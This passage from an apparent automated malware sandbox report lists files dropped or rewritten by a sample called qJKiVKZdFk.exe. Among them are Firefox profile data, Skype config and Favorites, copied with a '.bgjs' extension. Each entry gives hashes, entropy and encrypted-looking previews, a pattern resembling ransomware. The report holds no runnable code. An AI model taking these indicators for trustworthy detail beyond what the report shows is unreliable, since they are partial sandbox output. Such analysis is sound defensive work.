                                                                                                                                      Preview:{"env.2q...S,...{N.q......;..!......4......n...q(.?.L....wjQ9.J.3..5>......3..A....&.I7}.v....)......]O..3..N...../*...6a...P.t.'..r.|,v..Q....C..36..q.?.1.a..bu.....>6..)...=.w. .X-.)<*..:.....t.$|@.W.|...X.I&VT.R.QH.......U...A..V ......9.-Z4U.I...+.`0 I...%..uB.`8.5..[..7..;2n*8..Bl.7K....x.Q..........>............C..~N.)...$.p.^........<.$..*.9S!..an...UZ..>.a...1fz....WTF...{.+y.M....qb{.+..."...[^.l..WR...\.C....".....11;.....,.3...b......G..z...z.....m...;.tW...<,}Cy...y....,~H.2.........m...1.f..M.0.t.....i.6....U^(!.Z|.....Ge_A..s.....Mm.4.F...],.*.{.~).?..F. ...V.wU..*...P.NYQ....c<Xo..M..V._.n.....H~...v..OVW.[.....q?......p..B.iM*.R..m...j."...1.C..!.#/...\.:/.....c..._....c.}a.9_..B...VdX...j<9$L+nGE9...... .$&...Iu.......&..b)%.U7u.0.. Hg.r..w@..a..=X....Q.DP...!T....*&.e.%.C..k......V..x...# ...._..7<....nv....].P..I..t...(.x=..fy._.U.....9....e....UP....\S...&|.L.....e......$oe..N4g1fo.N..5L....OO.a.O.mT!./.......tk..|.+.h

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):384
                                                                                                                                      Entropy (8bit):7.294536071397227
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YGTV4lHV7XrHQeQkJzzfOlthIyDWJyXrH6ax1lngD4GR/NMlULnR0F2/qUPP3uk6:YGTV4TVQkJzzIPAG6cONaAo23nukIciD
                                                                                                                                      MD5:EA42B42F7A8B1B2E9EF8AD6B63BA093E
                                                                                                                                      SHA1:945EB5D7CECED36283A409BC880376E3B98B951B
                                                                                                                                      SHA-256:F599D74B9B1915DE7B36E02AF3C5B692D038C2A1F44A43C29F0AFE39461897D6
                                                                                                                                      SHA-512:7DC06C1A6B2495D0D9CD62A8532E0999CAC27EA972CE0A991D5627B606B89FBC1F5702CA68105A5624F20745298A65AFC62EBAD7C0D468CEC70648A1127FBF57
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"cre.T|G..Idf...rBT...........v......!Qe..TT@9N.rl.cL.c_...#.U.^D.H,.-.C..gs...X.V....r.O!.$.9g.0....e...>(.y...(.n.;*..5X`.:...4@`.....iG`.YO[..iIN..M.YfH..G^+....&]....t.Nx..8..n.......h._...D9rP7%H......>.F'.[.P..w(.y.H(.s.D.7%k..(.Nc..!5.h.q+...3...i...0.=81.AC".p.........M...5.,......<.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):98638
                                                                                                                                      Entropy (8bit):7.998053537795221
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:i5LgSB3LaP9GiDF5rQIkEKIGztk9+MLoxu:sS8iDF51kEKIGi+MLoY
                                                                                                                                      MD5:6EFCEC34A7834FEB29D28D8038BCC8AD
                                                                                                                                      SHA1:19EBB9531A215FA30A842DFCA404CF212B20FB53
                                                                                                                                      SHA-256:8A272944E3DB693FC0F63ACC42E194305E0243B0DF2DA6C09A22351B64B02AD8
                                                                                                                                      SHA-512:FAB621B0890B6C76AEE75035D565377F4E99250A1505A313467D20E935B6D5DFAC715B99F6CE6ED64E6ECD0FA629D39703F503F3456E64C386F87D38817A6A9C
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit...>.....h..bE.l..W..K.o.I..x...5.....8w.&...SB@$.;..T-y~..#...M....$n.#..}..^.(.....b..b%.]....lV..CD.R......2I.R.]..x+-..Z... ...v..Z%...a/..e* -KxGNo.....9M.....*.`.<5.....i.Wj..Kv.h.0Z.h..4..a...F....A.....l2..(.Y....`.P(.(vV9."...<_U.w....W.FT|../Mt..\..:.......4@O.......Y.z.-jxAZNa.lp.W..f....<.n..l.<.?nZ.un/u..C..S.2. ..7..6=N..ki..%.y.j..P...R..<....i..pZ......g*..v.@S1.Wia.t.|.Z...B..V..J....D..a.u.0..*/.B.]....r.w......]..[..~.....Z....P..8..a.....p>!}W.^...o..)])..XW.._.4....7w/"...x.v*zlY..U?......]..K.r.\...cuPS....:W...l.]...9.e.....p...s[..HW....B.V_..~,.$ %..Q....H1.n=..)`..`..v..;..|......+Y...}. ........S..AQ...8H.)...I!.$.....:...3i.x%.>.2p..1+.i..'..%6.J...7...M..2...L...5....Ue.2W^.....././.80\5.-.~..K^x....(aQ.d..{...c..J ...GG.G...M....+..}...Y..nI.e...Hu.X.=_..[M:..d$.....t.......Y.;..N....M.W.g-.8B.......h-s....*......).Q.q....c..2.. ....=.....`.XZ.6........X.V~.j5...........(..|....Y.e(......]{

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.994287424813097
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:DvsOXQkooShX1vbuuKHPcGRq0514afEQg/fmtrOG7:DdXP41zhKv7Rq0LfC8y6
                                                                                                                                      MD5:EF630413F32CCAB1C7D43CBBFAEB6E2B
                                                                                                                                      SHA1:6236F825E2173951E9CB5C09C35D6417D97516C4
                                                                                                                                      SHA-256:A3A561B6DACB272934F3E8F551CD3D6BFE19F873440E8D457CA690A9C37B8FCC
                                                                                                                                      SHA-512:DD295A682F83CC7BB6FA5DF90F2CB29704ACB010329FE8067F34F318C6DCCA159A32D6494113D7512C9CE36FE51060E2E45CFC9D819CB920F43E71FFF6DF20E4
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..-...WH...6...7.AS....._..].....ct.*.)..rJ)...0{.M..WZ..D..0...Z..<...V.b.^=....9z.........h@5.@$..r.lb|.Lk..PU.........u-..wt.w....A.2N5.dn..F<.....sW.v.)..H..f.z.6....$_$....x.aR.....W%Q....I..D..}....1h....9I.K.n.........F,...2P..2..'.X]...}..W.I.v{qGF..x.|n...>..q......4m1...I..[.W..l=.yb.....G=.....l..u)VB..>&mn.)Wt|.hC.W4.(./..?.!...q..n.m. v....._....(.A.8G......m.....j"N.... ....9....I..k.#F.E'..W_1pz@&`....S.h#.c...$.k.>.p........;.Zy..L..?.bUo.($.....7...D?...&..F. L3..;.IT.:&%....z4e.F......h....2v...`Q....,....~KZ.w.S.!..n...kj$..3"...4.+.....,.F...(h|8J.'>U..i./.....'J.U{{.:....w.....#.N..2.....D./..G.9sa.C...{8...."Vf...b.....H^.e..c..(.<.%..^a\z.^.~>.s.XT.f.I(....q.....15..).:B.;[.../.......%V;$....tBx.*....J.d_/D.C.'..O...8k..2.et.E."..C..b[.....!...s..A.W.6..A4B.ts....... O'.D.........*..'..F9..m..!..*.|.pO..Lo)....;[q.A..:....".X>*..{...&.eS...-....Xonb\..$$E>..M.t!nJ.... kx.*.....m....g..P.!..Z.".U.".17...l.$..JC.F4.l|n...c.

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):454
                                                                                                                                      Entropy (8bit):7.47507324730449
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YGbVBR2YNZ+/yA00AGjOVEYAzj7ukXKoEFgukIcii9a:YS+asfjnj6PjbD
                                                                                                                                      MD5:A7B73C49199221CDA90EAAD6072B87F8
                                                                                                                                      SHA1:49BF5426D80E16AEE83D73B9A6170B6E44F387B8
                                                                                                                                      SHA-256:E9457F05B8A1307393FC15171C4318F8B6E9C14BC050C677F2C559FCFAA6106E
                                                                                                                                      SHA-512:D5AB68A3BA8482B8A418A2F0692B59DAC8609BA9AC104789B2A2F7EB3A5A4417501D1218FC0DEB21BCB884AC484F72A11BB2B2A68FB8CD95AAB28AD52D8976C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"chr....].yR. .C.?...3..@.c..|.h.~.dq?.W.3.w+......H H.......>.Lo../.!..[.62.Z8...^....Z.3,...|R..a...Q.g{....i...Y.#......Wk...$BB\86Wg.k<......D....Wp.5...p....r...[%Q.*....F.....#.............S........v........{S.....,........U~!.."...%.V...k@"....,+...O.|.(.....D....;...,..!.I.e}?]..:o.[..B ...<eL4C@.4hj......?.hG..F....Ny.d.a.N.w1.D..z1......'....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):381
                                                                                                                                      Entropy (8bit):7.419541209945434
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:kdyFH5wMWOaQut27z3m5GozI6dMczmpkBZQlFOSHInXEfRDjM7Uoh83ukIcii96Z:Iy15GOaR+z3mQuIsMczmpkBulFOOSUlM
                                                                                                                                      MD5:806212BEA435B3685EEA0D9E72CC42A3
                                                                                                                                      SHA1:C9AD67A47CDD0D8BAA2166A4B4286F7874E058A1
                                                                                                                                      SHA-256:34F969A1902CD94EFF7021F62718C6BF87E941E6CAAF9E84883B08F3945A451F
                                                                                                                                      SHA-512:E0A129CC586EFDF7677EEA070C5619C65F6A1EF1CC897D4D52A4D9BA73B1C055FCD146675CDDF248E320412289D6B698CB7833D783315B5D53118AA6A391435B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{."cr.B...I. ..{........L$.....-.....Hb=....v.G\....M..j..e.u.......u..Z{....!. j..5......n....S..Pk..S..;u.....>.}'.b.A.....x..V].Q.)..........d.5Ll..c.<HB.y.kq.........H..V..C..D8...oz...J1G`...$g_...s.+}..e../.....i#G..T"..m!d5.`$.v(.....0..r.".....&.e...m.x..Vn.L..^....c5GH....d.g...^.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Skype\RootTools\roottools.conf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):410
                                                                                                                                      Entropy (8bit):7.3750704376138945
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Q6K74W8b3VPVPrbDMJFMHAeLDgwIos43uukIcii9a:QD4WU9BbD9gKg3V43JbD
                                                                                                                                      MD5:58FA4EDB218C7F989B4EC4D01D1D7DDB
                                                                                                                                      SHA1:056771D9F594E3E67BEE8DA75E1F73D3396952D4
                                                                                                                                      SHA-256:2A6A819314D59B3A7356076C48418A3C6BA18BEE4B9B02050CE230E2FF2E1783
                                                                                                                                      SHA-512:B7E0D8EBA351B82AE38E4032708537598FB7E55D809FB29ECE79A3F85D0E6FB4069CD03F9FBBC25DF3C86830011B6B5AA95DB2D209ACA34B83BFDEE4189E9957
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:node_fSF...c..#...eF....J.........vA9p..%.gwbJAfM,..Y.=.>[tq..{....zN<.0........Z..\..z.....32.U ~...pz.........u..H..v'.Q'N..o.kE.O'o...}.Z...C.-...~.p...Gm\O....ey.(s~01}....zr.B..O.....|K..r$.NZ...s]...2..I5..H....O.(..7..w..}..fr....!Br..N..'R....8.|t<L.'.L2.*..{t..v..%=....^...xj.P....".r.:.;...C'..#.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\Application Data\Skype\RootTools\roottools.conf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):410
                                                                                                                                      Entropy (8bit):7.3750704376138945
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Q6K74W8b3VPVPrbDMJFMHAeLDgwIos43uukIcii9a:QD4WU9BbD9gKg3V43JbD
                                                                                                                                      MD5:58FA4EDB218C7F989B4EC4D01D1D7DDB
                                                                                                                                      SHA1:056771D9F594E3E67BEE8DA75E1F73D3396952D4
                                                                                                                                      SHA-256:2A6A819314D59B3A7356076C48418A3C6BA18BEE4B9B02050CE230E2FF2E1783
                                                                                                                                      SHA-512:B7E0D8EBA351B82AE38E4032708537598FB7E55D809FB29ECE79A3F85D0E6FB4069CD03F9FBBC25DF3C86830011B6B5AA95DB2D209ACA34B83BFDEE4189E9957
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:node_fSF...c..#...eF....J.........vA9p..%.gwbJAfM,..Y.=.>[tq..{....zN<.0........Z..\..z.....32.U ~...pz.........u..H..v'.Q'N..o.kE.O'o...}.Z...C.-...~.p...Gm\O....ey.(s~01}....zr.B..O.....|K..r$.NZ...s]...2..I5..H....O.(..7..w..}..fr....!Br..N..'R....8.|t<L.'.L2.*..{t..v..%=....^...xj.P....".r.:.;...C'..#.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\Favorites\Bing.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):542
                                                                                                                                      Entropy (8bit):7.546840061241254
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:2SQyltUZupDhsmtU2E0O9nAvq569LzT0ANQWw/AuyOuYukIcii9a:SWm0imti0OQfrQWwIuyRbD
                                                                                                                                      MD5:3879983E479015088CFC19A4056472C9
                                                                                                                                      SHA1:F7EFCFD261626682FD833E746B6040AD8B734045
                                                                                                                                      SHA-256:544CC8ECFF1644BFB975E50AF3E68D71CE138BA6CFB2EF57EED93C88EF84D031
                                                                                                                                      SHA-512:55BE033CD25350CDB019D480C3A1CE8E46C29DF247E66E2FC194BB9AE6CF237FFD647E61700E707CAA440041093AF66C3B2F99BB71194991D7744612B078E8D7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000|..A.".O.x..G.W.......@......|n...k..H...... u!.h.o..<.k1.:.4q,...[~0......L..g..O..q.>..w.tY....hf........4.3....xw}.g...3...K .r{.!x....hX.....f...1..,....u%.q...vN...KyE....r..7e...........Rp.j......9..............\Z1_.c...<.d....oZ.|U..}....;g...id{<b..u1!..u......1.3...i@W...Y..._......X..U...z.]........}.,?.^..F.S.Ye...!p.2.'.nRMp.y..v..c....z.Qk.s.'C[{.@..3p.{..{..^h....`i\..C.N}w.c...E.d<y...a.|.D._J...k.Y..n.74...$^6........tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\Favorites\Bing.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):542
                                                                                                                                      Entropy (8bit):7.546840061241254
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:2SQyltUZupDhsmtU2E0O9nAvq569LzT0ANQWw/AuyOuYukIcii9a:SWm0imti0OQfrQWwIuyRbD
                                                                                                                                      MD5:3879983E479015088CFC19A4056472C9
                                                                                                                                      SHA1:F7EFCFD261626682FD833E746B6040AD8B734045
                                                                                                                                      SHA-256:544CC8ECFF1644BFB975E50AF3E68D71CE138BA6CFB2EF57EED93C88EF84D031
                                                                                                                                      SHA-512:55BE033CD25350CDB019D480C3A1CE8E46C29DF247E66E2FC194BB9AE6CF237FFD647E61700E707CAA440041093AF66C3B2F99BB71194991D7744612B078E8D7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000|..A.".O.x..G.W.......@......|n...k..H...... u!.h.o..<.k1.:.4q,...[~0......L..g..O..q.>..w.tY....hf........4.3....xw}.g...3...K .r{.!x....hX.....f...1..,....u%.q...vN...KyE....r..7e...........Rp.j......9..............\Z1_.c...<.d....oZ.|U..}....;g...id{<b..u1!..u......1.3...i@W...Y..._......X..U...z.]........}.,?.^..F.S.Ye...!p.2.'.nRMp.y..v..c....z.Qk.s.'C[{.@..3p.{..{..^h....`i\..C.N}w.c...E.d<y...a.|.D._J...k.Y..n.74...$^6........tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\Local Settings\Adobe\Color\ACECache11.lst.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):932
                                                                                                                                      Entropy (8bit):7.767320392219112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:POGu9Ic70ym5ZqhqpWQMUYtZe3GTjvhSkHJaq46wRRNulp7wZhH4CMJjfWn9AazC:zu1LOWE387Aq4jAbI0JjO9AaWPbD
                                                                                                                                      MD5:A341067EC65545172949919F7B0292A7
                                                                                                                                      SHA1:FEA52DD8466DF2A3B9BC4D2AD404BEA18675B491
                                                                                                                                      SHA-256:36B071ED19F2412B11430F53A36635FB06988BF9BB98103381AF04A9A3DDB0F0
                                                                                                                                      SHA-512:7C3C5AAA1343820B9EC3677D7103E9102422343F64DD888A35C377078043444C38B7E30A91F5EFF3BE881A0F34C908F30299E7CEE09958C2A2DB6FFA957E5C25
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CPSA....8;p....VT;.0c..J..o{....l......s......y..6`.. ...b...%\[..>un@.........e..x.SB..|...h(...Cz.y{r....w..>~.D.:..m|."......#....><..%.E......_.3.[..!.E!..`.,..j..$H...............nKRe........../.$.#.P.;....1..K.|j....Z...Z.4..z:-...S..DO..D.u...j.?b.....X..wd.uk...A.G./;.l..d.PD<...hC.9G<......i..R..z}._.;.4%.......{....[...?....s.<Q.G..{P.7dbH..X..c].A...%V.."..kR..A.U.h .%....."A6'r.z.Q*..]).`@.t...L...qT.u.....?.q..S.<...c...z..4..}Q.......U..Yd.z\Z....1.p.;........j.k&.~.NGK.if....Z.9C..Z&%o..V..(........~..$.+..42v.=.{...]-...':4L.F#C.V. &...dec.)I..........8]..W.8..A=..ei..D......y..kH~...d.z%@...b..s...mf...=..t...z..:/T...q.D.....[......j..5.4q_....R.ON.><.......J4t..k$.hIJ...#.....G/+.-f.O..^..>/%.z.K......1.2/.}:.6.NW.._....^P.....!.....=..F...qA.8............1......{.z..,VS.?... tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\Local Settings\Comms\UnistoreDB\USS.jcp.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975416807113566
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:h9bH7w+0yypZtt99vxv5g6N8FhfzgJbwV+yOFriCkb/:h9bHE+St93RBIUJC+pr8b
                                                                                                                                      MD5:690EEFEB554F1BCEF7F3B34AFCE60F6C
                                                                                                                                      SHA1:D75F66302DC7526C2BAF915165E5FB16B30CBD34
                                                                                                                                      SHA-256:A75DC7DF868CF72069015800F194DEFFDE4AAC630702B8550A97B8C1CD83C721
                                                                                                                                      SHA-512:557F89C02B885315B5BE7BA8280F9DCE5A3923904783502E17BFB28F5ECF793C1DDC83B7AA945CBEDF09AFF3185FCA7B8DD850D7B2E23708DD7695A8A4243391
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.M.#.R../.J.Q.1...."1..^]H.[x.u..0{'c.p}..T|?Wt....&..bf..J..uE.........{.7+M.... .<._..A?...2y...osc.TX.A$Idll..._ ...-.%?s.>0..q...f.S.P...C..."...A.b-....."..,xt2U.$..x..z...K^...[.(U..x{..)./XU....*...7.d.*.h..}..v._.9....#......=N..y.;.......:.p.J....=.CM>.\..~B.@.U....e1C..u]xO#.4.....Q...._..F._D..#{Q,{.pUP.8..%...M.Y...%..W......J.9zp...=.y./..."k0.....SN..."..I.E.C...F=.....q...../<.1\...9GF....-..@........3..=p..j.=4@...NV]..p...{\-...*Y...aj.._.0.E.ixZO......-.7X...0. GY#k.*......r..|.....F..ZU.....u.OwXw....TP.j..Zhe..K.&..%.......W&d^ ..IFx............]..C..O.oQ;..K..>..0..../.0{..2G=.4..^l..i$.....:.UMT^W^;S..o...X...."M.......dJv.+".......7.....p...O.7....w..-....N...J{..z#.?....2..~..V...`..K.HJyn=.c..|7.4......|.....q*..=s..d.I.!..).......cn....$S...H"Dz....1e...S....%8..8...(e0E....vZ....R. Os..|.{....T..j..%oh....ro.~....,....o...S..+?...3v.....&s..A\..bd.S.....#..vU[.4...P._y..}9....4.....O....."............yFx.!.).7.?..=.....

                                                                                                                                      C:\Users\jones\Local Settings\Comms\UnistoreDB\USS.jtx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):1.7310902822930134
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:mLwgT5xn0Gofq0o6Ys2O1e02fKvsF5v/aGKo3agO/qqv4RROYdVbtzFnrG5J5qhA:Yw85WLq8Ys1ifKEFpDKfCdYSa
                                                                                                                                      MD5:E38EA95D58D6547C15D2A762961FBCA9
                                                                                                                                      SHA1:27E14FB2040D3C36402425EBBDD95E1BC95D5051
                                                                                                                                      SHA-256:D81A46FFCB50BC5D92E28C0A9FA145C0D09243D9D2A8A4F48510628FBFF24E88
                                                                                                                                      SHA-512:A7A67541B43DF5429263971E65AC09FA1FAFD461EAD82EFAEBE0A4008F492631A2433E505ADA3E2C29B85AE3D68B8BBE7D608672BEDFDA3A64952A60D8640344
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...?.^........\8.=.".Y.@.....?.}........V.=4.....<..r..%.../.....I.S.o...$!...-4.IY....m.yq...T.b;.I..ye...L'.....Y..d..J..."..c..4&....p.q.'Kj..]~x.#C.5.`..o.s."..l/......4s8....ao.d....P./......`KK..........G.....5#.H....t..Q.....B..3..7.o....{...@?'.6..../E....M?..y/PL..em/..#]...pY..S3....A..........E..\.e.$>s:8.j45...2..9..B.!..v..b.Y6..< .L8Dy...C.......fT..>..8...4...&+.O......nO5.....7..]f.........x......8.....F*z.G..u.#...X..<.X.}.0...=....%.zXH..R.e.5R...i:.....(...._..,..;..&.@...(c.k..mHO.)E..$F.av.~ .x..8.Ygp...yL.jO...a.....%..@,.v.I.. zj.M..W.*i...;...<...t..k=..\..qf.......=.3......=i.,....O.ir..tS%K."..v..B....2..Q;_.6......b?.T.T.9....^`~.)...q.B..q\...I3.......*O....x........L...!=p.....+.....|..r.......zo...I..q...!.)&...g......TUN.0a.N.H..^'3.y<...."..z..........\..y.......Q.).,...R8.L_}.?..jq?.....2K..e$.V>..Ggf..>.6t.G.m.M.fB4..b...}..{..aN.k..A.e_.......r.....'..$p..:...L|...>.&..K.y......wI.n.W)H....r.R.D..

                                                                                                                                      C:\Users\jones\Local Settings\Comms\UnistoreDB\USSres00001.jrs.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6707429395122255
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:3u/GWLPPfZwHZdggK843ZCzfiCHut2OvXCEsVqiWOzu/yz:e/GWL3fe5fu3ZCLVutvXXs0iWnyz
                                                                                                                                      MD5:124AA23FD7587C4F731A19A03F649788
                                                                                                                                      SHA1:BA86D70DD9EC11EFE4895BC04BB0335788EC6233
                                                                                                                                      SHA-256:8B7EB6B310995D59E37297B2680142E6FC40B8D4A42FD8DB3FB69A5FF1382085
                                                                                                                                      SHA-512:39E8DC4882441FC115E766238BAC0B6F9560811A7996228067C6EEAD2D401B5D890063AD486394A5E9AE858EB1CF064ECAD16A3A66670EEE48F36EF2CFD15F9A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.......[.x..CWWV...Pa.p./K..a~\{fXG........u1P.....{....F..r..g\/7.(}..:.;...o.:~....<".R.....ip'...@@.....,g..l..YI.*-..Jj.?K.Jcf...]...DN.H>.H&>..Q.9Y..E7.v~.F.y.........gm.O.:..5<S.`"..\..tB..^..s.].h.q3..;4,[....B..X..+.2....K...y.N.0.)..i.......P...n.Z...Rk....Q+.+.KS.)r\.E...#.H...6...I[&,t...Wz.1...t....PW.i/.sG....yy...c^.(.(.......k?!.6...Sl..h=5.60..k...".).%...0.?.rB.....@\D.....9w..8...Z...e.q...D..\.......Kk.M^.M!;M....S.~...+.......<....Z..|......H.}R.oo.>.Y..D-.D.*.F..I...-~.,.3n........y...S.:.....I.4m..}M8.$.x63...;......Y_@.#....T.5.........2N..^.L9...E..E.e....Y.n1m7...[.zN.n..X....O.Wl..+\.....D.....k.......t.B........B.O3..D...YA.(L.^.f..bSf.w..l._....Z.."0......7.cn..p2.)S/W$..*F7.^.!.i.6.....1..5....T.S.E..`.6.G,..~......v.tq...VW%..urY...'.y.<.....H0...b..?.O...#..0'O...;P.....{.+6.?Q. ...J.4.>...!...1...`..m.-(..YW..e.1.d..._...;.h@..1.n......,z#-.Lw....u{E.Z..........y x..c.....@.!;(t3.......n....\..Rq.$......'....

                                                                                                                                      C:\Users\jones\Local Settings\Comms\UnistoreDB\USSres00002.jrs.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6706511526126343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:zSGjBrIm/lmAP3csMC0rCXXIryiIaN30gzWm:+AcmdmSvMrCnunIaN30gzB
                                                                                                                                      MD5:11AD5CE96E9565D55EE2472DC638DBBF
                                                                                                                                      SHA1:3B2E4F87559ABA518A2C00E85FB07A398A0D121C
                                                                                                                                      SHA-256:1AE9959A4391D11E289E84CE1FBBC9AA3FB75326BDBB50DA54B9BB817F10D575
                                                                                                                                      SHA-512:5C1623BEA1A0632987588FF96B15DA045BE6804C0B7D186DF7C5DED05F0897F94C3A25D89C3FEDA9C7AA568CAEB39329BECC2B3343021976307FB18F05DB62B7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......_&.Sl\.E..[a..a...gqb..#.:..;j&|.!.p...a...-.&.?/4 .Y)$.J..`F.x...77....%.....-*i....[...K.v....P."..2.2..E..P.7.K.`.&....).S.[......i W.%.9n4..+......B.\. .....)B.....y....8.>m1.4.~....wz..v.+........a.hU.,...0..a07N a.R........[_.2?6g.[..J.N..>..M}...b.....Le.....g..U.&.....R.K...i..H....o.^......Bb..;.3..d..e..f.h......[....R..d_.5.g..%M6.....&%.f.X.0p7.'...6...c.....+;..U.4.{....;tL..+..+.$..$6.....\....tbJ.:5(..Ga..ER..I".qS.8..`.q...+...6..... ..AG..kQ.*.Cb..y....2.JU@.D.yCJ..X..P(JW.>.1....r.......x.8!..B...........j.2.C......@.....5.....!Df.K@..[.....5..[.ZcL+.5..D_...+.t.$a:.D.V.p.gi.......&....O1.-...L......}..2....<..1.Y...k...c...Ny...f.&..K.I..>X...V...i]._+.eM@..2a&sV...%.baiCw.oC.j.f._....3z..r...,..K...w.....&..S..V..`.a.G....Y.$X..sUe....q..6..........5.EP...e70Cdo.._...!?.j.>.8....J7.q..l....j.3.u....Cc&...n...k.....i.Er.f.w.fm;V.G..^./p..)=q5./...'..).mK..^.....d..XlsDS..7..*..Vj..|....l{/.....K.i....m1.../.

                                                                                                                                      C:\Users\jones\Local Settings\Comms\UnistoreDB\USStmp.jtx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
